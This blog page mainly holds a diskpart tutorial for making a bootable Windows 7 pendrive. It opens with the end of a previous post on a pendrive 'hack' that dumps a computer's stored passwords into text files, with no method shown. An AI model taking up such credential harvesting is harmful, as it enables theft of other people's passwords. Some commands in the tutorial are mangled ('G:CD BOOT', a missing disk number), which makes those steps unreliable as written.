4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP and Vista
NOTE: This procedure will only recover the stored passwords (if any) on the Computer.
::::::CLICK ON SUBSCRIBE BUTTON PLEASE::::

Install Windows 7 from a Pendrive / Create a bootable Pendrive to install Windows 7

Here is a small and working tutorial to install windows 7 from a bootable USB or Pendrive. These days most of them have a USB or Pendrive. So why don’t you try this trick. Earlier i have posted on How to Install vista from a Pendrive. Installing Windows 7 using a pendrive is very much faster than that from DVD/CD. You just need to follow some small steps to do this. You can keep this pendrive/USB drive for future installation of Windows 7. If you are a beginner or dont want to get messed up by typing in all commands, here is a Free Utility To Create A Bootable USB To Install Windows 7, Vista & Server 2008. This tool will help you to automate the process of bootable pendrive’s and you can install windows 7 from pendrive easily. If not you can follow this guide to install windows 7 from a pendrive.


Make sure you have a Pendrive or USB drive with a minimum of 4 GB space and you have the Windows 7 installation DVD. This tutorial is best suited if you have a Windows 7 DVD with you else you need to change it


  1. Format the Pendrive or USB drive in NTFS format first.
  2. From the start menu right click on the command prompt and select “Run as administrator“.
  3. Now type the following commands (Press enter key after each command).
  4. diskpart. This is to open the disk partition program.
  5. Now to show the list of drives type list disk.
  6. You can see disk’s listed there. Note down the disk number of your pendrive eg. Disk .
  7. Now type SELECT DISK X (where X is the number you noted down for the pendrive from step 5)
  8. Now type CLEAN.
  9. Now type the following commands by pressing enter after each one.
  10. CREATE PARTITION PRIMARY
  11. SELECT PARTITION 1 (Assuming your pendrive/ USB drive is 1).
  12. ACTIVE
  13. FORMAT FS=NTFS
  14. ASSIGN
  15. EXIT(Now the disk partition program will exit). Now we need to give some more commands.
  16. Now insert the Windows 7 Installation DVD and to your DVD drive.
  17. Here i am assuming DVD drive as G and Pendrive as I.(Change it accordingly).
  18. Now type G:CD BOOT
  19. Now type this command BOOTSECT.EXE/NT60 I: to update your USB drive with bootmgr code.
  20. Finally copy all the contents from the Windows 7 DVD to your Pendrive. Make sure you don’t cause any errors.
  21. Plug / Insert your pendrive to your PC and restart the system.
  22. Now Enter the Bios system accordingly by pressing the key delete.(This may vary some times it will be F2 or F12. It depends on the type of your system. Any how during the start up your system will display which key to press to enter the Bios).
  23. Now select the USB/ Pendrive as the first boot driver.(Set the first boot priority to USB drive.).
  24. Now save the settings in Bios and restart and you will be able to Install Windows 7 using that pendrive.
If you liked it make a comment . Feel Free to ask if you have any doubts. I will Try my best to Help You.

CLICK ON SUBSCRIBE BUTTON TO GET MORE UPDATES

Recommend us on Google!

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More